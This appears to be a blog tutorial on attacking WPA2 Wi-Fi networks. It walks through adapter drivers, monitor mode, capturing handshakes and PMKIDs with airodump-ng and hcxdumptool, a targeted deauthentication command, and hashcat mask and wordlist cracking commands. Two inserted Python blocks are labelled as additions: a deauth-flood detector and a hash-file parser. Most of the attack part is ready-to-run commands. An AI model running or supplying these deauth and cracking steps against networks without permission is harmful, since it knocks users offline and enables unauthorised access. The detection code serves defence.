Bread and Butter Wifi Attacks and Hash Cracking
Wi-Fi cracking is a fundamental skill. We’re looking at the Aircrack-ng suite alongside the other tools that shaped the state of the art in WPA2 hash capturing and cracking.
Aircrack-ng Setup
We’re gonna work with root permissions most of the time.
$ sudo -i
For those using the RTL8812AU chipset, installing the driver is straightforward.
$ git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git
$ cd rtl8812au
$ make install
Managing Drivers
Removing and reinstalling network drivers can often resolve issues with device compatibility.
$ dpkg -r realtek-rtl88xxau-dkms
$ dpkg -r realtek-rtl8814au-dkms
Repo Drivers
Be careful when going with drivers from the repos - most of the time you’ll end up in more trouble.
$ apt install realtek-rtl88xxau-dkms
$ apt install btscanner aircrack-ng kismet
$ pip3 install kismet_rest deepdiff
Device Configuration
Before launching any attacks, confirm that your network devices are properly recognized and configured:
$ dmesg | grep 88xx
$ iwconfig
More useful commands
$ lsmod
$ blkid
$ lsblk
$ lsusb
Process Management
We noticed a better success rate when killing the processes like this instead of the airmon-ng way; this might be system or adapter specific. Note that the supplicant process is called wpa_supplicant (with an underscore).
$ killall wpa_supplicant NetworkManager
Alternatively, you can use airmon-ng to manage interfering processes.
$ airmon-ng check kill
Initiating Monitor Mode
Monitor mode is essential for capturing packets.
$ airmon-ng start wlan0 wlan1
Dumping Hashes
Kismet
Kismet allows for detailed network scanning using multiple adapters.
$ kismet -c wlan0 -c wlan1
airodump-ng
The de facto standard still works great - even though more sophisticated tools are available today. The capture prefix is given with -w (-o is the short form of --output-format):
$ airodump-ng -w dump01 --output-format pcap wlan0,wlan1
More useful params
--essid MyWifiAP                       (filter by ESSID)
--bssid ...                            (filter by BSSID)
-b abg                                 (bands: 2.4/5 GHz)
-c 1                                   (channel)
--essid-regex ".*Vag\|VAG\|vag{1}.*"   (filter by ESSID regex)
--essid "CIA Surveillance Van"         (ESSIDs with spaces need quoting)
-t OPN                                 (filter by encryption, here open networks)
hc-tools
hcxdumptool
For more targeted attacks, tools like hcxdumptool are useful for capturing newer types of hashes. However, PMKID usage is rare, so you might not get what you expect. We found little to no noticeable advantage when dumping directly with the hcx tools over using airodump-ng - this may of course be region / target dependent.
We’re still very happy about the development of the hcx tools as well as the overall progress in Wi-Fi dumping / cracking tools.
$ hcxdumptool -i wlan0 -o dump02.pcapng
Converting capture files for processing with hashcat:
$ apt install hcxtools
$ hcxpcapngtool -o pcapng_hashes *.cap
Deauthentication Attacks
A simple deauthentication attack can disconnect clients from their access points:
$ aireplay-ng --deauth 200 -a BA:A2:34:22:E7:68 -c 6D:A7:EC:3A:47:58 wlan0
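The defender’s side of the deauth attack above, as an added example that is not part of the original post: a sliding-window check that flags a deauthentication flood per BSSID, the kind of alert a wireless IDS such as Kismet raises. The frame log, the addresses, the window length and the threshold are all constructed assumptions.

```python
"""Flag deauthentication floods in a log of 802.11 management frames, the kind
of check a wireless IDS such as Kismet raises as a deauth-flood alert."""
from collections import defaultdict, deque

WINDOW_S = 1.0   # sliding window in seconds (assumed value)
THRESHOLD = 10   # deauth frames per BSSID inside the window that raise an alert

# Constructed frame log (timestamp_s, subtype, bssid, receiver); the addresses
# are placeholders, not captured values. One deauth at 0.5 s is normal client
# churn; the burst from 1.0 s onward mimics a deauth flood against one client.
FRAMES = [(0.00, "beacon", "aa:bb:cc:00:00:01", "ff:ff:ff:ff:ff:ff"),
          (0.50, "deauth", "aa:bb:cc:00:00:01", "11:22:33:44:55:66")]
FRAMES += [(1.0 + i * 0.01, "deauth", "aa:bb:cc:00:00:01", "11:22:33:44:55:66")
           for i in range(40)]
FRAMES += [(2.00, "deauth", "aa:bb:cc:00:00:02", "ff:ff:ff:ff:ff:ff")]


def detect_deauth_floods(frames, window=WINDOW_S, threshold=THRESHOLD):
    """Return {bssid: alert} for every BSSID whose deauth rate crosses threshold.

    Frames must be in time order. Only the first crossing per BSSID is reported,
    so a long flood yields one alert rather than one per frame."""
    recent = defaultdict(deque)   # bssid -> deauth timestamps inside the window
    alerts = {}
    for ts, subtype, bssid, receiver in frames:
        if subtype != "deauth":
            continue
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window:          # drop timestamps older than the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerts:
            alerts[bssid] = {"at": ts, "count": len(q),
                             "broadcast": receiver == "ff:ff:ff:ff:ff:ff"}
    return alerts


if __name__ == "__main__":
    for bssid, alert in detect_deauth_floods(FRAMES).items():
        print(f"deauth flood from {bssid}: {alert['count']} frames in "
              f"{WINDOW_S}s, first seen at t={alert['at']:.2f}s")
```

Networks running Protected Management Frames (802.11w) discard unauthenticated deauth frames, so this alert matters most where PMF is not enabled.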
Cracking Hashes
Using Aircrack-ng for local cracking is straightforward but can be slow:
aircrack-ng
$ aircrack-ng dump.pcap -w wordlist.txt
Hashcat
$ .\hashcat.exe -m 22000 -d 2 -a 6 -i --increment-min=3 -1 ?l?d -2 ?u?l?d hashes.pcapng rockyou.txt ?2?1?1?1?s?s
$ .\hashcat.exe -m 22000 -d 2 -a 6 -i -1 "?l?d!_-+*$" hashes.pcapng wpa2_ultimate.txt ?1?1?1?1
Display SSIDs
We made a little bin tool to display SSIDs from hashdump files:
https://github.com/Network-Sec/bin-tools-pub/blob/main/hashdump_to_ssid.py
EAPOL
Capturing the complete 4-way handshake including EAPOL isn’t as important as hcxpcapngtool and some hashcat forum posts may make it sound. airodump-ng still delivers in certain scenarios, sometimes even faster and better than hcxdumptool.
The conversion will work despite the tool complaining, and the resulting hashes are the same. Of course, the PMKID attack is a different story, but we find that many modern routers have been patched and are no longer vulnerable to it, while we can still capture WPA2 hashes the traditional way.
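To see what a converted dump actually contains (the point of both the SSID tool and the EAPOL note above), here is an added parser for the hashcat 22000 lines hcxpcapngtool writes; it is not the post’s hashdump_to_ssid.py. It decodes the hex ESSID, separates PMKID from EAPOL entries and names the handshake message pair the EAPOL MIC came from. Every MAC, PMKID, MIC, nonce and EAPOL value in the sample is a constructed placeholder.

```python
"""Parse hashcat mode 22000 (WPA-PBKDF2-PMKID+EAPOL) lines as written by
hcxpcapngtool and summarise which SSIDs they belong to."""
from collections import defaultdict

# Constructed sample in the 22000 line format (9 fields separated by '*');
# every MAC, PMKID, MIC, nonce and EAPOL value is a placeholder, not a capture.
SAMPLE_HASHES = """\
WPA*01*00112233445566778899aabbccddeeff*aabbccddeeff*112233445566*486f6d654e6574***
WPA*02*ffeeddccbbaa99887766554433221100*aabbccddeeff*112233445566*486f6d654e6574*00*0103005f0203*02
WPA*01*0123456789abcdef0123456789abcdef*0a0b0c0d0e0f*a1a2a3a4a5a6*4f66666963655f4150***
not a hash line at all
"""

HASH_TYPES = {"01": "PMKID", "02": "EAPOL"}
# Low three bits of the MESSAGEPAIR field name the two handshake messages
# the MIC was taken from (hashcat's hccapx/22000 message_pair values).
MESSAGE_PAIR = {0: "M1+M2", 1: "M1+M4", 2: "M2+M3", 3: "M2+M3", 4: "M3+M4", 5: "M3+M4"}


def parse_line(line):
    """Return a dict for one valid 22000 line, or None for anything else."""
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA" or fields[1] not in HASH_TYPES:
        return None
    try:
        essid = bytes.fromhex(fields[5]).decode("utf-8", errors="replace")
    except ValueError:   # ESSID field is not valid hex
        return None
    rec = {"type": HASH_TYPES[fields[1]], "ap": fields[3], "client": fields[4],
           "essid": essid}
    if rec["type"] == "EAPOL" and fields[8]:
        rec["pair"] = MESSAGE_PAIR.get(int(fields[8], 16) & 0x07, "unknown")
    return rec


def summarise(text):
    """Map each SSID to its PMKID/EAPOL counts and the AP MACs seen for it."""
    summary = defaultdict(lambda: {"PMKID": 0, "EAPOL": 0, "aps": set()})
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        summary[rec["essid"]][rec["type"]] += 1
        summary[rec["essid"]]["aps"].add(rec["ap"])
    return dict(summary)


if __name__ == "__main__":
    for essid, info in summarise(SAMPLE_HASHES).items():
        print(f"{essid!r}: {info['PMKID']} PMKID, {info['EAPOL']} EAPOL, "
              f"APs={sorted(info['aps'])}")
```

Run it over the real output of hcxpcapngtool -o to audit which of your own networks turned up in a capture and whether an entry rests on a PMKID or on an M1+M2 pair alone.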
Tshark and Tcpdump
Don’t skip learning about Tshark and Tcpdump. They deliver much needed “how this works” insight and also give you easy ways to do manually, with options of your own choosing, what hcxpcapngtool does for you.
Wordlists
Wordlists specific to Wi-Fi. We created a couple of wordlist generator helper tools; you can find them on our GitHub:
https://github.com/Network-Sec/Wordlists
More Wordlist resources:
- https://github.com/vladimircicovic/wifi_pass
- https://github.com/kennyn510/wpa2-wordlists
- https://github.com/victorpreston/bruteX/ (Including Python Wifi Bruteforce tool)
Important:
We can get a massive gain in speed and success rate if we exclude words shorter than 8 characters, as that is the minimum passphrase length for WPA2.
$ grep --binary-files=text -Pe "^[\w\s]{8,32}$" rockyou.txt | sort -u > wifi_rockyou.txt
Next Up
We’ll follow up with a dedicated article about Hash Cracking Strategies, an applied field manual of modern techniques that help you tackle hashes which are harder than top-10000-wordlist passwords or 7 random characters.
Conclusion
“Welcome to the 21st Century. Where sex is free, but love is expensive. Where Pizza arrives faster than an Ambulance and a Smartphone is more important than dignity.”
“Welcome to the darkness, where lying is modern, treason is smart and poverty a flaw.”